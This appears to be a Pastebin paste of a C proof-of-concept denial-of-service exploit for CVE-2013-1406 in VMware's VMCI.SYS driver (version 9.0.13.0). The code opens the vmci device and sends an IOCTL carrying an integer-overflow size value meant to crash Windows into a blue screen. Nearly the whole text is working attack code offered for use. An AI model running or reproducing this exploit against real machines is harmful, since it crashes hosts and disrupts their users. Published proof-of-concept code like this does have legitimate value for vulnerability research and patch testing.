0x16_7ton

CVE-2013-1406 PoC DOS exploit

Mar 5th, 2013
1,142
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2. This PoC only for version
  3. VMCI.SYS 9.0.13.0
  4. */
  5.  
  6. #include "stdafx.h"
  7. #include "windows.h"
  8.  
  9. #define count_massive 0x189        
  10. #define ioctl_vmsock  0x8103208C
  11. #define integer_overflow_size 0x12492492;
  12.  
  13.  
  14. int _tmain(int argc, _TCHAR* argv[])
  15. {
  16.     HANDLE vmci_device;
  17.     DWORD bytesRet;
  18.     int inbuf [count_massive];
  19.     int outbuf[count_massive];
  20.     int size_=count_massive*sizeof(int);
  21.    
  22.     printf("**************************************************\r\n");
  23.     printf("[*]0x16/7ton CVE-2013-1406 simple PoC DOS exploit*\r\n");
  24.     printf("**************************************************\r\n");
  25.     //opening vmci interface device
  26.     vmci_device=CreateFileW(L"\\\\.\\vmci",GENERIC_READ,FILE_SHARE_WRITE|FILE_SHARE_READ,NULL,OPEN_EXISTING,NULL,NULL);
  27.     if (vmci_device!=INVALID_HANDLE_VALUE)
  28.     {
  29.         printf("[+]vmci device opened \r\n");
  30.         //prepare input buffer
  31.         memset(&inbuf,0,size_);
  32.         //vulnerable to integer overflowing parameter
  33.         inbuf[4]=integer_overflow_size;
  34.         printf("[+]After delaying we send IOCTL,prepare to BSOD \r\n");
  35.         //Delaying signed with Diablo stamp :D
  36.         Sleep(0x29a);
  37.         Sleep(0x1000);
  38.         DeviceIoControl(vmci_device,ioctl_vmsock,&inbuf,size_,&outbuf,size_,&bytesRet,NULL);
  39.         CloseHandle(vmci_device);
  40.     }
  41.     else
  42.     {
  43.         printf("[-]Error: Can't open vmci device!\r\n");
  44.     }
  45.     return 0;
  46. }
RAW Paste Data